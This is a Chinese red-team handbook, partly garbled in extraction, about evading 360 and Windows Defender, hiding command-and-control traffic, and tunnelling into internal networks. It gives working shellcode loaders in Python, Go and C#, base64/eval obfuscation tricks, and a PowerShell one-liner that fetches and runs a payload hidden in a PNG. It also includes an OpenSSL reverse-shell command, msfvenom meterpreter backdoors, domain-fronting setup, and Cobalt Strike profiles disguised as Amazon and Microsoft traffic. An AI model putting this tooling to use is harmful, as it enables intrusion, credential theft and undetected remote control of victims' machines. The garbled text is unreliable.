2023HW紅隊(duì)工作指南手冊(cè)

HW紅隊(duì)工作指南手冊(cè)免殺篇 3免殺WindowsDefender 3白名單繞過(guò)Defender查殺 4免殺360安全衛(wèi)士和360殺毒 4mimikatz免殺過(guò)360安全衛(wèi)士和360安全殺毒 5PrintSpoofer免殺過(guò)360殺毒360安全衛(wèi)士 8MSF用加載器免殺過(guò)360安全衛(wèi)士和360安全殺毒 10Python3Cobaltstrikeshellcode免殺過(guò)360衛(wèi)士和360殺毒 14Golang加載器Cobaltstrikeshellcode免殺國(guó)內(nèi)主流殺軟 16GolangCobaltstrikeshellcode免殺國(guó)內(nèi)主流殺軟 19c#xor加載器免殺過(guò)360安全衛(wèi)士和360安全殺軟 20Cobaltstrike免殺過(guò)360和WindowsDefender 24msf加密殼免殺過(guò)360安全衛(wèi)士和360安全殺毒 25Cobaltstrike免殺過(guò)360和WindowsDefender 26Invoke-PSImage免殺過(guò)360殺毒 28MSF免殺360安全衛(wèi)士安全殺毒 30流量加密 31使用Openssl反彈加密shell 31MSF流量加密躲避檢測(cè) 33域前置cobaltstrike逃避IDS審計(jì) 35域前置技術(shù)原理 35工作原理 36域前置實(shí)踐 40cobaltstrike域前置配置 42cobaltstrike生成證書(shū)修改C2profile流量加密混淆 47生成免費(fèi)的ssl證書(shū) 47創(chuàng)建并修改C2-profile文件 49檢測(cè)C2profile文件是否可用 52配置teamserver文件運(yùn)行上線 53生成后們進(jìn)去測(cè)試 53隧道應(yīng)用 55端口映射 55端口映射與端口轉(zhuǎn)發(fā) 55netsh端口映射 55netsh端口轉(zhuǎn)發(fā)監(jiān)聽(tīng)metperter 57cobaltstrike多層內(nèi)網(wǎng)上線 58cobaltstrike正向連接多層內(nèi)網(wǎng) 58cobaltstrike反向連接多層內(nèi)網(wǎng) 62端口映射burpsuite抓內(nèi)網(wǎng)數(shù)據(jù)包 65burpsuite設(shè)置上游代理訪問(wèn)內(nèi)網(wǎng) 67MetasploitPortfwd（端口轉(zhuǎn)發(fā)/重定向） 70內(nèi)網(wǎng)穿透Neo-reGeorg的使用 71SSH隧道轉(zhuǎn)發(fā)的常見(jiàn)場(chǎng)景 75使用Earthworm(EW)做Socks5代理完成內(nèi)網(wǎng)穿透 81Tunna搭建HTTP正向代理 83利用ICMP隧道技術(shù)進(jìn)行ICMP封裝穿透防火墻 85DNS隧道穿透防火墻 87frp內(nèi)網(wǎng)穿透 91網(wǎng)絡(luò)釣魚(yú)篇 97Office釣魚(yú)攻擊 97cobaltstrike生成宏 97創(chuàng)建宏98測(cè)試宏文件 100利用DOCX文檔遠(yuǎn)程模板注入執(zhí)行宏 101創(chuàng)建dotm文件 101創(chuàng)建遠(yuǎn)程模板加載文檔 103執(zhí)行測(cè)試 105Excel4.0宏躲避殺軟檢測(cè) 106CHM電子書(shū)釣魚(yú) 109lnk快捷方式釣魚(yú) 克隆網(wǎng)站釣魚(yú) 假網(wǎng)站釣魚(yú) FLASH網(wǎng)頁(yè)釣魚(yú) 文件釣魚(yú) 利用偽裝文件 120CobaltStrike魚(yú)叉釣魚(yú) 1215.關(guān)注 1236.培訓(xùn)網(wǎng)站 123道應(yīng)用篇。免殺篇WindowsDefenderWindowsDefenderwindow10Defender您持續(xù)有效地工作。Defender查殺在win2016/2019繞過(guò)WindowsDefender的版本里c-exclusionsDefender并不會(huì)查殺這些文件名的進(jìn)程Processexclusions%SystemRoot%\system32\inetsrv\w3wp.exe%SystemRoot%\SysWOW64\inetsrv\w3wp.exe%SystemDrive%\PHP5433\php-cgi.exemkdirSystemDrive%\PHP5433exeDefendermimikatz為例子，mimikatz已經(jīng)被我做PHP5433php-cgi.exeDefender查殺。360360360360安全中心出品的一款免費(fèi)的云安全殺毒軟件。它創(chuàng)新性地整BitDefender傘)360360360QVM人工智能引擎。mimikatz360360安全殺毒MimikatzWindows認(rèn)證(LSASS)NTLM哈希值的工具，攻擊者可以借此漫游內(nèi)網(wǎng)。也可以通過(guò)明文hash值來(lái)提權(quán)。因?yàn)檫@款工具特別出名所以被查殺的機(jī)率很大，githubbypass反病毒軟件。位到字符串上，定位到輸入表上。Mimikatz源代碼下載/gentilkiwi/mimikatzvs2012依賴文件VisualC++MFCforand64https://aka.ms/vs/16/release/vc_redist.x64.exeDesktopdevelopmentwithc++報(bào)錯(cuò)：errorMSB8020，解決方法：項(xiàng)目->屬性->常規(guī)->平臺(tái)工作集，將平臺(tái)改為VS2012(v110)后即可成功運(yùn)行編譯。如果出現(xiàn)以下情況kuhl_m_net.c這個(gè)文件的注釋去掉即可1>modules\kuhl_m_net.c:errorC2220:警告被視為錯(cuò)誤-沒(méi)有生成“object”文件1>modules\kuhl_m_net.c:warningC4819:該文件包含不能在當(dāng)前代碼頁(yè)(936)中表示的字符。請(qǐng)將該文件保存為Unicode格式以防止數(shù)據(jù)丟失編譯成功選擇releasex64運(yùn)行的時(shí)候360安全衛(wèi)士會(huì)進(jìn)行攔截免殺步驟替換mimikatz關(guān)鍵字moonteamsmimikatz下的文件全部改為moonteams資源版本信息去掉把項(xiàng)目里所有的文件注釋去掉/* BenjaminDELPY`gentilkiwi`benjamin@Licence:/licenses/by/4.0/*/刪除提示運(yùn)行提示更換圖標(biāo)最終效果PrintSpoofer360360Windows10和WindowsService2016/2019提權(quán)工具，現(xiàn)在主流的提供工具之一，360安全會(huì)自動(dòng)查殺，其他殺毒軟件并不會(huì)查殺，往后可能更多的防護(hù)軟件會(huì)對(duì)其進(jìn)行攔截查殺。對(duì)其進(jìn)行源碼免殺，首先下載源碼/whojeff/PrintSpoofer用vs2019選擇releasex64編譯PrintSpoofer.cpp里面的輸出幫助文檔全部清空項(xiàng)目文件搜索PrintSpoofer替換其他這改成moonsecPrintSpoofer.cppPrintSpoofer.h全改為其他名字這里改成moonsec加一個(gè)ico圖標(biāo)最終結(jié)果MSF360360metasploitMetasploit是免費(fèi)的工具，因此安全工作人員常用Metasploit工具來(lái)檢測(cè)系統(tǒng)的安全性。MetasploitFramework(MSF)2003shellcode編寫(xiě)和漏洞研究提供了一個(gè)可靠平臺(tái)。其中攻擊載荷模塊(Payload)，在紅隊(duì)中是個(gè)香餑餑，使用這個(gè)模塊生成的后門(mén)，不僅支持多種平臺(tái)，而且Metasploit還有編碼器模塊項(xiàng)目地址/rsmudge/metasploit-loader編輯metasploit-loader/master/src/main.c把以下去掉if(argc!=3){printf("%s[host][port]\n",argv[0]);exit(1);}安裝編譯器 sudoapt-getinstallmingw-w64編輯i686-w64-mingw32-gccmain.c-omm.exe-lws2_32設(shè)置監(jiān)聽(tīng)器msf>useexploit/multi/handlermsf exploit(handler)>setwindows/meterpreter/reverse_tcp=>windows/meterpreter/reverse_tcpmsf exploit(handler)>set=>31337msf exploit(handler)>setLHOST80LHOST=>41msf exploit(handler)>exploit-j64位免殺編譯免殺工具Dev-Cpp5.11TDM-GCC4.9.2Setup下載地址/projects/orwelldevcpp/文件->新建項(xiàng)目->consoleApplication->c項(xiàng)目修改文件把winsock2.h移動(dòng)到windows.h上不然編譯會(huì)出錯(cuò)。這四處的數(shù)字做一些更改編譯設(shè)置加上-static-libgcc-lws2_32按F9編譯完成設(shè)置metasploit的監(jiān)聽(tīng)器setpayloadwindows/x64/meterpreter/reverse_tcp正常上線可以過(guò)掉國(guó)內(nèi)大多數(shù)的殺毒軟件。Python3Cobaltstrikeshellcode免殺過(guò)360Python2.7現(xiàn)在很多殺毒軟件都會(huì)查殺免殺效果有點(diǎn)差?？梢允褂胮ython3來(lái)做shellcode的免殺處理。Python3下載下載最新的版本當(dāng)前實(shí)驗(yàn)的版本是Python3.8.664位pyinstaller4.0/downloads/pipinstallpyinstallerPython3shellcode加載代碼importctypes#shellcode加載defshellCodeLoad(shellcode):ctypes.windll.kernel32.VirtualAlloc.restype=ctypes.c_uint64ptr=ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(shellcode)),ctypes.c_int(0x3000),ctypes.c_int(0x40))buf=(ctypes.c_char*len(shellcode)).from_buffer(shellcode)ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_uint64(ptr),buf,ctypes.c_int(len(shellcode)))handle=ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_uint64(ptr),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(handle),ctypes.c_int(-1))ifname =="main":編譯pyinstaller-Ftest.py--noconsole有時(shí)候殺毒軟件會(huì)查殺這一段代碼ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_uint64(ptr),buf,ctypes.c_int(len(shellcode)))可以使用編碼進(jìn)行處理再eval動(dòng)態(tài)執(zhí)行代碼eval(base64.b64decode("Y3R5cGVzLndpbmRsbC5rZXJuZWwzMi5SdGxNb3ZlTWVtb3J5KGN0eXBlcy5jX3VpbnQ2NChwdHIpLGJ1ZixjdHlwZXMuY19pbnQobGVuKHNoZWxsY29kZSkpKQ=="))Python3shellcode加載代碼importctypesimportbase64#shellcode加載defshellCodeLoad(shellcode):ctypes.windll.kernel32.VirtualAlloc.restype=ctypes.c_uint64ptr=ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(shellcode)),ctypes.c_int(0x3000),ctypes.c_int(0x40))buf=(ctypes.c_char*len(shellcode)).from_buffer(shellcode)eval(base64.b64decode("Y3R5cGVzLndpbmRsbC5rZXJuZWwzMi5SdGxNb3ZlTWVtb3J5KGN0eXBlcy5jX3VpbnQ2NChwdHIpLGJ1ZixjdHlwZXMuY19pbnQobGVuKHNoZWxsY29kZSkpKQ=="))handle=ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_uint64(ptr),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(handle),ctypes.c_int(-1))ifname =="main":GolangCobaltstrikeshellcodeGo語(yǔ)言目前是最火的編程語(yǔ)言之一，使用go語(yǔ)言編寫(xiě)的加載器，運(yùn)行shellcode可以過(guò)國(guó)內(nèi)主流殺軟，例如360安全衛(wèi)士、360安全殺毒、火絨、瑞星、金山、電腦管家。免殺效果很好。而且操作免殺的步驟簡(jiǎn)單。項(xiàng)目地址/jax777/shellcode-launchGo語(yǔ)言編譯器下載/dl這里選擇Cobaltstrike選擇c代碼shellcodeshellcode-launchcopywindows下winlaunch.goshellcodepackagemainimport("shellcode-launch/winshellcode")funcmain(){sc:=[]byte("你的shellcode")winshellcode.Run(sc)}32位運(yùn)行setCGO_ENABLED=0setGOOS=windowssetGOARCH=386gobuild-ldflags="-s-w"winlaunch.go64位運(yùn)行win_64.batsetCGO_ENABLED=0setGOOS=windowssetGOARCH=amd64gobuild-ldflags="-s-w"winlaunch.go已經(jīng)可以過(guò)360安全殺毒世界殺毒網(wǎng)只有五款殺毒軟件報(bào)毒V只有兩款報(bào)毒運(yùn)行GolangCobaltstrikeshellcode這個(gè)也是golangshellcode加載器也可以免殺國(guó)內(nèi)的主流殺軟項(xiàng)目地址/vyrus001/shellGomain.go這個(gè)部分就是運(yùn)行計(jì)算器的shellcode打開(kāi)cobaltstrike->payloadGenerator-選擇C#替換計(jì)算器的shellcode編譯gobuildmain.go世界殺毒網(wǎng)只有五款防護(hù)軟件報(bào)毒效果還是是不錯(cuò)的。cxor360360c#文件特別的小，可以很好的投遞傳輸。項(xiàng)目地址/antman1p/ShellCodeRunner用vs2019打開(kāi)sln項(xiàng)目文件xorkryptorcobaltstrikeraw二進(jìn)制文件ShellCodeRunner.exepayload.binencrypt.bin就是經(jīng)過(guò)編碼后的文件。Rsources和encrypt.bin文件事實(shí)上項(xiàng)目是沒(méi)有這個(gè)文件夾和文件所以再當(dāng)前目錄新建文件夾和將生成好的shellcode文件encrypt.bin復(fù)制到文件夾里。右鍵選擇編譯文件即可。這就是生成好的后門(mén)。已經(jīng)可以完全過(guò)掉360運(yùn)行正常VVTCobaltstrike360WindowsDefenderAdvancedAVEvasion是紅隊(duì)的shellcode免殺加載器能免殺360和微軟Defender防護(hù)軟件生成正常上線可以過(guò)windowsdefendermsf360360項(xiàng)目地址/bats3c/darkarmour安裝依賴文件sudoaptinstallmingw-w64-toolsmingw-w64-commong++-mingw-w64gcc-mingw-w64upx-uclosslsigncodeMsf生成后門(mén)msfvenom-pwindows/x64/meterpreter/reverse_tcpLHOST=80LPORT=4444-fexe-oexploit.exe執(zhí)行命令./darkarmour.py-fexploit.exe--encryptxor--jmp-oe.exe--loop5Cobaltstrike360WindowsDefender這次帶來(lái)的時(shí)gogo現(xiàn)在還是有很多殺軟還是可以過(guò)的。今天用到的攻擊下載地址/diljith369/avbypassGo#simple-antivirus-bypass-technique原理利用go里面的cmd執(zhí)行遠(yuǎn)程下載powershell后門(mén)這個(gè)部分修改成你的cs后門(mén)編譯文件gobuildbypassav.go360會(huì)有攔截放行后可上線WindowsDefender無(wú)任何提示可以上線Invoke-PSImage360Invoke-PSImagePowerShellPNG傳遞-Web行它們。它會(huì)利用圖片中每個(gè)像素點(diǎn)最后42個(gè)顏色值來(lái)存儲(chǔ)PayloadPNGPayloadPayloadPNG的。據(jù)大小來(lái)選擇圖片（盡可能多的像素點(diǎn)）。例如，Invoke-MimikatzInvoke-PSImage/peewpw/Invoke-PSImagecspowershellshellcodeSet-ExecutionPolicyUnrestricted-ScopeCurrentUserImport-Module.\Invoke-PSimage.ps1轉(zhuǎn)換圖片Invoke-PSImage-Script.\payload.ps1-Image.\test.jpg-Out.\test2.png-Web生成執(zhí)行代碼salaNew-Object;Add-Type-AssemblyName"System.Drawing";$g=aSystem.Drawing.Bitmap((aNet.WebClient).OpenRead("/evil.png"));$o=aByte[]3840;(0..1)|%{foreach($xin(0..1919)){$p=$g.GetPixel($x,$_);$o[$_*1920+$x]=([math]::Floor(($p.B-band15)*16)-bor($p.G-band15))}};IEX([System.Text.Encoding]::ASCII.GetString($o[0..3534]))/evil.png替換生成的圖片下載鏈接在目標(biāo)上執(zhí)行salaNew-Object;Add-Type-AssemblyName"System.Drawing";$g=aSystem.Drawing.Bitmap((aNet.WebClient).OpenRead("27:80/test2.jpg"));$o=aByte[]3840;(0..1)|%{foreach($xin(0..1919)){$p=$g.GetPixel($x,$_);$o[$_*1920+$x]=([math]::Floor(($p.B-band15)*16)-bor($p.G-band15))}};IEX([System.Text.Encoding]::ASCII.GetString($o[0..3534]))最終效果360安全衛(wèi)士360殺毒軟件沒(méi)任何提示W(wǎng)indowsDefender會(huì)查殺MSF360metasploitMetasploit因此安全工作人員常用Metasploit工具來(lái)檢測(cè)系統(tǒng)的安全性。MetasploitFramework(MSF)2003shellcode編寫(xiě)和漏洞研究提供了一個(gè)可靠平臺(tái)。其中攻擊載荷模塊(Payload)，在紅隊(duì)中是個(gè)香餑餑，使用這個(gè)模塊生成的后門(mén)，不僅支持多種平臺(tái)，而且Metasploit還有編編碼器模塊msf自帶的編碼器和免殺模板都是很難繞過(guò)360全套殺毒軟件Cooolis免殺過(guò)360全套，這是國(guó)人的一個(gè)項(xiàng)目，可以過(guò)掉360全套。下面我來(lái)介紹這個(gè)項(xiàng)目，項(xiàng)目的地址/Rvn0xsy/Cooolis-ms/加載器執(zhí)行流程：Cooolis-ServerCooolis-ServerMetasploitRPC服務(wù)端Payloaddockergitclone/Rvn0xsy/Cooolis-ms.gitcdCooolis-ms/Dockerdocker-composeup-d啟動(dòng)MetasploitRPC服務(wù)器msfrpcd-Umsf-Pmsf-u/api/1.0/-a配置Metasploit監(jiān)聽(tīng)器msf5>useexploit/multi/handlermsf5>setpayloadwindows/meterpreter/reverse_tcpmsf5>setLHOST1msf5>setLPORT8876msf5>exploit-j啟動(dòng)Cooolis-ms客戶端Cooolis-ms.exe-pwindows/meterpreter/reverse_tcp-oLHOST=1,LPORT=8876,Format=dll-H1-P8899流量加密OpensslshellshellshellIDS止。使用wireshark抓包直接看到輸入的命令和返回的信息這些危險(xiǎn)命令會(huì)被防火墻或者ips檢測(cè)。所以要對(duì)這些信息進(jìn)行混淆或加密。泛被應(yīng)用在互聯(lián)網(wǎng)的網(wǎng)頁(yè)服務(wù)器上。在kali上使用OpenSSL生成自簽名證書(shū)opensslreq-x509-newkeyrsa:4096-keyoutkey.pem-outcert.pem-days365-nodes在kali上監(jiān)聽(tīng)端口openssls_server-quiet-keykey.pem-certcert.pem-port8080在目標(biāo)上執(zhí)行反彈shell命令mkfifo/tmp/s;/bin/sh-i</tmp/s2>&1|openssls_client-quiet-connect29:8080>/tmp/s;rm/tmp/s流量已經(jīng)經(jīng)加密MSFmetasploitOpenSSL創(chuàng)建SSL/TLS證書(shū)opensslreq-new-newkeyrsa:4096-days365-nodes-x509\-subj"/C=UK/ST=London/L=London/O=Development/CN="\-keyout.key\-out.crt&&\cat.key.crt>.pem&&\rm-f.key.crt生成后門(mén)msfvenom-pwindows/meterpreter/reverse_winhttpsLHOST=17LPORT=443PayloadUUIDTracking=trueHandlerSSLCert=.pemStagerVerifySSLCert=truePayloadUUIDName=ParanoidStagedPSH-fpsh-cmd-opentestlab.bat設(shè)置監(jiān)聽(tīng)器配置偵聽(tīng)器時(shí)還需要使用兩個(gè)附加選項(xiàng)。這是為了通知處理程序它將使用的證書(shū)（與有效負(fù)載相同），并在接收到連接時(shí)執(zhí)行SSL證書(shū)驗(yàn)證。HandlerSSLCertStagerVerifySSLCertsetpayloadwindows/meterpreter/reverse_winhttpssetLHOST49setLPORT443setHandlerSSLCert/home/kali/msf/.pemsetStagerVerifySSLCerttrueexploit抓包數(shù)據(jù)包已經(jīng)加密從有效負(fù)載將在目標(biāo)主機(jī)上執(zhí)行的那一刻起，一個(gè)加密的MeterMeter會(huì)話將打開(kāi)，它將不允許主機(jī)入侵防御系統(tǒng)檢查數(shù)據(jù)包并斷開(kāi)連接。域前置cobaltstrikeIDS域前置（DomainFronting）HTTPS通用規(guī)避技術(shù)，也被稱為域前端網(wǎng)MtsploitCobltStike等團(tuán)隊(duì)控制服務(wù)器流量，Amazon,Google，Akamai等大型廠商會(huì)提供一些域前端技術(shù)服務(wù)。域前置技術(shù)原理CDNC2CDNipHost頭進(jìn)行流量轉(zhuǎn)發(fā)，利用我們配置域名的高可信度，如我們可以設(shè)置DLP，agent等流量監(jiān)測(cè)。原理以下工作原理域前置的的核心是cdncdn是的工作原理是：IP可以被不同的域名進(jìn)行綁定然而進(jìn)行網(wǎng)站加速，例如現(xiàn)在有兩個(gè)網(wǎng)站分別為和都指定同一個(gè)IP23這個(gè)ip上是cdn的時(shí)候怎么保證HTTPhost頭加入訪問(wèn)的域名。演示18是一個(gè)cdn服務(wù)器這個(gè)服務(wù)器上轉(zhuǎn)發(fā)多個(gè)域名都是這個(gè)cdn服務(wù)器上的域名而且這兩個(gè)域名都綁定了別名進(jìn)行cdn加速curlhttphost如圖在curl里面指定CDN的IP指定host為上面兩種放法都可以訪問(wèn)域名里的內(nèi)容。同一個(gè)cdn訪問(wèn)不同的網(wǎng)址在host加上你要訪問(wèn)的域名請(qǐng)求頭，cdn就可以知道你與哪個(gè)域名進(jìn)行通信，就會(huì)得到指向網(wǎng)頁(yè)的內(nèi)容。cdnip18所以我們也可以這樣訪問(wèn)如圖在wget里把ip替換成域名因?yàn)橐彩侵赶騝dn服務(wù)器所以訪問(wèn)的也是正常內(nèi)容。域前置基礎(chǔ)就是基于這個(gè)原理，所以我們可以申請(qǐng)一批高信譽(yù)的域如接近microsoft類似這類域名，然后在請(qǐng)求頭里加上cdncdnIPC2ip也會(huì)被自動(dòng)隱藏。域前置實(shí)踐環(huán)境cobaltstrike4.0外網(wǎng)kali在某云、某鵝、Amazon購(gòu)買cdn云加速服務(wù)。注意在國(guó)內(nèi)使用cdn云加速都需要域名進(jìn)行備案，如你使用某云的必須去申請(qǐng)或者購(gòu)買已備案的域名。這里以某云做一個(gè)域前置例子首先準(zhǔn)備一個(gè)已經(jīng)在某云備案好的域名在cdn服務(wù)選擇全站加速/overview提交準(zhǔn)備好的域名審核通過(guò)后某云會(huì)提示你進(jìn)行下一步操作。指定你c2服務(wù)器的真實(shí)ip設(shè)置完成后把的CNAME域名里進(jìn)行CAME綁定設(shè)置完成后過(guò)一段時(shí)間就會(huì)生效。在超級(jí)ping測(cè)試cdn的ip是否正常大部分已經(jīng)生效了。接下來(lái)就是配置cobaltstrikecobalt域前置配置C2profile/xx0hcd/Malleable-C2-Profiles選擇合適的profile文件修改host頭為我們的準(zhǔn)備好的域名##Amazonbrowsingtrafficprofile##Author:#setsleeptime"5000";setjitter "0";setmaxdns "255";setuseragent"Mozilla/5.0(WindowsNT6.1;WOW64;Trident/7.0;rv:11.0)likeGecko";http-get{seturi"/s/ref=nb_sb_noss_1/167-3294888-0262949/field-keywords=books";client{header"Accept""*/*";header"Host""www.mazibao.vip";metadata{base64;prepend"session-token=";prepend"skin=noskin;";append"csm-hit=s-24KU11BB82RZSYGJ3BDK|1419899012996";header"Cookie";}}server{header"Server""Server";header"x-amz-id-1""THKUYEZKCKPGY5T42PZT";header "x-amz-id-2""a21yZ2xrNDNtdGRsa212bGV3YW85amZuZW9ydG5rZmRuZ2tmZGl4aHRvNDVpbgo=";header"X-Frame-Options""SAMEORIGIN";header"Content-Encoding""gzip";output{print;}}}http-post{seturi"/N4215/adj/amzn.us.sr.aps";client{header"Accept""*/*";header"Content-Type""text/xml";header"X-Requested-With""XMLHttpRequest";header"Host""www.mazibao.vip";parameter"sz""160x600";parameter"oe""oe=ISO-8859-1;";id}

parameter"sn";parameter"s""3717";output{base64;print;}}server{header"Server""Server";header"x-amz-id-1""THK9YEZJCKPGY5T42OZT";header "x-amz-id-2""a21JZ1xrNDNtdGRsa219bGV3YW85amZuZW9zdG5rZmRuZ2tmZGl4aHRvNDVpbgo=";header"X-Frame-Options""SAMEORIGIN";header"x-ua-compatible""IE=edge";output{print;}}}在kali上運(yùn)行teamserver加上配置文件sudonohub./teamserver16xxxxxa222filenohub加在一個(gè)命令的最前面，表示不掛斷的運(yùn)行命令不然shell斷了cs也會(huì)連接不上。以上運(yùn)行沒(méi)有出錯(cuò)的情況下配置監(jiān)聽(tīng)器選擇payloadbeaconhttpshttpshsots是某云cdn的ip生成后門(mén)進(jìn)行測(cè)試這個(gè)代碼生成后，可以放在其他服務(wù)上千萬(wàn)不要放在c2上不然真是的ip就被查出來(lái)了。運(yùn)行木馬上線正常，功能正常。再用Wireshark進(jìn)行抓包走cdn節(jié)點(diǎn)流量進(jìn)行也加密了C2服務(wù)器的ip也隱藏了。cobaltstrikeC2profilecobaltstrikeAPT方面近幾年應(yīng)用范圍很ids入侵新制定。C2profile實(shí)際上就是對(duì)流量加密傳輸，目的逃逸流量安全審計(jì)，穿透檢測(cè)器。本次實(shí)驗(yàn)環(huán)境kalicobaltstrike4.0ssl證書(shū)cobaltstrikecobaltstrike.storecobaltstrike會(huì)被檢測(cè)。下面是生成證書(shū)的一些命令。keytool-genkey-aliasmoonsec-keyalgRSA-validity36500-keystoremoonsec.storemoonsecmoonsec.store這兩個(gè)字符串都要記住因?yàn)樾薷膒rofile要使用填寫(xiě)相關(guān)的地區(qū)信息這些信息填寫(xiě)后在profile上還要使用請(qǐng)勿亂填，填寫(xiě)了要保存。完成上面得命令后提示你要輸入得密碼！輸入密碼moon123后提示地區(qū)信息按照提示一步一步填寫(xiě)。US MicrosoftUpdates最輸入y即可生成證書(shū)文件。證書(shū)文件已經(jīng)生成好。C2-profile文件setsample_name"moonsecPOSMalware";setsleeptime"5000";#usea~30sdelaybetweencallbackssetjitter "10"; #throwina10%jittersetuseragent"Mozilla/5.0(WindowsNT6.1;rv:24.0)Gecko/20100101Firefox/24.0";#設(shè)置證書(shū)https-certificate{setCN "US";setO "MicrosoftUpdates";setC "en";setL "US";setOU "MicrosoftUpdates";setST setvalidity"365";}#設(shè)置code-signer{setkeystore"moonsec.store";setpassword"moon123";setalias"moonsec";}#指定DNSbeacon不用的時(shí)候指定到IP地址setdns_idle"";#每個(gè)單獨(dú)DNS請(qǐng)求前強(qiáng)制睡眠時(shí)間setdns_sleep"0";#通過(guò)DNS上載數(shù)據(jù)時(shí)主機(jī)名的最大長(zhǎng)度setmaxdns "235";http-post{seturi"/windebug/updcheck.php/aircanada/dark.php/aero2/fly.php/windowsxp/updcheck.php/hello/flash.php";client{header"Accept""text/plain";header"Accept-Language""en-us";header"Accept-Encoding""text/plain";header"Content-Type""application/x-www-form-urlencoded";id}

netbios;parameter"id";output{base64;prepend"&op=1&id=vxeykS&ui=Josh@PC&wv=11&gr=backoff&bv=1.55&data=";print;}}server{output{print;}}}http-get{seturi"/updates";client{metadata{netbiosu;prepend"user=";header}}server{header"Content-Type""text/plain";output{base64;print;}}}注意設(shè)置這個(gè)兩個(gè)地方#設(shè)置證書(shū)https-certificate{setCN "US";setO "MicrosoftUpdates";setC "en";setL "US";setOU "MicrosoftUpdates";setST setvalidity"365";}#設(shè)置code-signer{setkeystore"moon.store";setpassword"moon123";setalias"moon";}檢測(cè)C2profile文件是否可用./c2lintfile運(yùn)行正常失敗得是會(huì)出線紅色。配置teamserver文件運(yùn)行上線teamserver默認(rèn)端口是50050修改端口被檢測(cè)出來(lái)。運(yùn)行teamservernohup./teamserver35 123456file&放在后臺(tái)運(yùn)行避免shell關(guān)閉teamserver也關(guān)閉生成后們進(jìn)去測(cè)試監(jiān)聽(tīng)器選擇payloadhttps設(shè)置端口443訪問(wèn)https的時(shí)候證書(shū)已經(jīng)生效而且操作并不會(huì)被查殺。上線運(yùn)行正常wireshark抓取流量分析https流量已經(jīng)加密。隧道應(yīng)用端口映射是指將一臺(tái)主機(jī)的內(nèi)網(wǎng)（LAN）IP地址映射成一個(gè)公網(wǎng)IP地址機(jī)器的多個(gè)端口映射到內(nèi)網(wǎng)不同機(jī)器上的不同端口。端口映射與端口轉(zhuǎn)發(fā)射轉(zhuǎn)發(fā)只能實(shí)現(xiàn)外網(wǎng)到內(nèi)網(wǎng)的單向通信。netsh端口映射netshwindows工具可以內(nèi)置中端口轉(zhuǎn)發(fā)功能。以下是一個(gè)常見(jiàn)的場(chǎng)景b7777WEBkalib服務(wù)器的7777端口上的內(nèi)容因?yàn)椴辉谕粋€(gè)網(wǎng)段kali不能直接訪問(wèn)BB服務(wù)器不能直接出網(wǎng)。windowsnetshinterfaceportproxy可以通過(guò)這個(gè)小A服務(wù)器設(shè)置端口轉(zhuǎn)發(fā)。1設(shè)置轉(zhuǎn)發(fā)netshinterfaceportproxyaddv4tov4listenport=設(shè)置的端口connectaddress=B服務(wù)器(ip)connectport=端口netshinterfaceportproxyaddv4tov4listenport=7777connectaddress=55connectport=77772.訪問(wèn)42:7777即可獲取B服務(wù)器上的端口內(nèi)容3.其他說(shuō)明清除規(guī)則指定規(guī)則netshinterfaceportproxydeletev4tov4listenport=7777查看轉(zhuǎn)發(fā)規(guī)則netshinterfaceportproxyshowall清除s所有規(guī)則規(guī)則netshinterfaceportproxyreset4不能訪問(wèn)可以在A服務(wù)器有有防火墻對(duì)7777端口過(guò)濾netsh端口轉(zhuǎn)發(fā)監(jiān)聽(tīng)metperter在服務(wù)器A上可以通過(guò)設(shè)置代理訪問(wèn)B服務(wù)器.如果拿到b服務(wù)器的權(quán)限通常是生成正向的后門(mén)，然后kalimsf可以正向連接B服務(wù)器，由此得到metperterBmsfAAkalimsf上。msf生成后門(mén)msfvenom-pwindows/meterpreter/reverse_tcplhost=53lport=4455-fexeA服務(wù)器上增加命令將端口4455轉(zhuǎn)發(fā)到kali上的4455端口上netshinterfaceportproxyaddv4tov4listenport=4455connectaddress=35connectport=4455kali上設(shè)置監(jiān)聽(tīng)usewindows/multi/handlersetpayloadwindows/meterpreter/reverse_tcpsetlhost35setlport4445bmetpertercobaltstrikecobaltstrike簡(jiǎn)稱csAPT長(zhǎng)期是以攻擊企業(yè)內(nèi)網(wǎng)為主，所以考慮到內(nèi)網(wǎng)穿透。內(nèi)網(wǎng)穿透方式，分為正向和反向，正向是可以直連內(nèi)網(wǎng)teamserverBA有權(quán)csBcobalt正向連接多層內(nèi)網(wǎng)首先A服務(wù)上已經(jīng)有了csABteamserverA作為作為跳板可以訪問(wèn)B。1.生成監(jiān)聽(tīng)器選擇windowsexecutable(s)填寫(xiě)名字和要連接的端口生成的后門(mén)在B服務(wù)器上執(zhí)行cs42interact進(jìn)入beacon用命令連接上B服務(wù)器connect5512345最后正向連接上B服務(wù)器cobalt反向連接多層內(nèi)網(wǎng)B服務(wù)器上有防火墻進(jìn)行攔截，那么cobaltstrike的反向連接。反向連接可以突破防火墻的攔截，因?yàn)槭菑姆?wù)器內(nèi)部反向連接出站。以下是一個(gè)存在防火墻的反向連接teamserver的圖AB怎么解決？可以用反向連接突破。listernerhostport保存即可創(chuàng)建后門(mén)選擇帶有s的選項(xiàng)在listener選擇剛剛創(chuàng)建的監(jiān)聽(tīng)器。B服務(wù)器執(zhí)行后門(mén)bA4.B服務(wù)器得會(huì)話端口映射burpsuite抓內(nèi)網(wǎng)數(shù)據(jù)包這里存在兩個(gè)網(wǎng)段AC不能直接互通A如果想直接訪問(wèn)C80端口用burpsuiteBABBC80ABCnetsh是windows自帶的工具可以好輕易的設(shè)置端口映射netshinterfaceportproxyaddv4tov4listenport=設(shè)置的端口connectaddress=C服務(wù)器(ip)connectport=端口在B上執(zhí)行命令設(shè)置好規(guī)則netshinterfaceportproxyaddv4tov4listenport=7777connectaddress=55connectport=80用瀏覽訪問(wèn)B服務(wù)器的7777端口即可獲取C服務(wù)器上80端口的內(nèi)容用burpsuite抓包即可burpsuite設(shè)置上游代理訪問(wèn)內(nèi)網(wǎng)msf入到內(nèi)網(wǎng)再做橫向滲透或其他操